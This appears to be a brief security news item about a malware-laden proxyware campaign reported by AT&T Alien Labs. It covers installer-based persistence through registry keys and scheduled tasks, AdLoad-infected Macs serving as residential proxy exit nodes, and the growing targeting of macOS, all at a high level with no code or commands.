The monetization of malware-infused proxy servers through affiliate programs poses a significant challenge. The proxy application, packaged with Inno Setup, persists through multiple mechanisms, including registry keys and scheduled tasks, enabling the proxy to continually function as a covert channel for unauthorized financial gains.

Collected information being sent to C&C server (Screenshot: AT&T Alien Labs)

The campaign’s disclosure builds upon previous findings by AT&T Alien Labs, in which macOS systems infected with AdLoad adware were repurposed as exit nodes for a vast residential proxy botnet.

This pattern potentially points to operators of AdLoad orchestrating a pay-per-install campaign. AdLoad, a notorious adware strain masquerading as legitimate applications, has been capitalizing on unsuspecting users to navigate them towards malicious websites, ultimately profiting from these schemes.

This evolving threat landscape is particularly concerning for macOS users, as the dark web has seen an exponential rise in the advertisement of information stealer strains and sophisticated tools aimed at bypassing macOS security mechanisms.

The past few years have witnessed an intensified focus on targeting macOS devices due to their growing prevalence in corporate environments, coupled with the high potential for earnings from malicious activities.

Tag

#mac